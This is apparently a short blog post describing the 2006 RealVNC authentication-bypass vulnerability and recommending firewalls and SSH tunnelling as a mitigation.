UrlBlogGrey

A security vulnerability was discovered in the RealVNC software in mid-May 2006 that exposed a means of bypassing the authentication step while connecting to a RealVNC server. VNC is a network protocol that allows multiple clients on a network to remotely interact with a computer running a VNC server program, such as the RealVNC software affected by the vulnerability. Being able to avoid authentication means that anyone might be able to connect to a computer running a RealVNC server, regardless of whether they have the authority to do so.

There are a lot of programs that handle authentication in an insecure way; however, most of these programs rely on secure transport protocols (i.e. SSL) to keep the authentication credentials safe while in transit. However, this vulnerability means that even if you tunnel the unencrypted VNC traffic through a secure channel (i.e. an authenticated SSH session), the VNC server is vulnerable if the port it's listening on is open to the public. This vulnerability can be patched by operating a firewall on the machine and exposing only the SSH port to the public. Once authenticated using SSH, a client can tunnel their VNC traffic to the VNC server port on the same machine from behind the firewall (over the loop-back device).

This vulnerability is pretty serious, but I think that it provides a good incentive for people to follow better security practices when using VNC servers. The value of firewalls and SSH cannot be emphasized enough.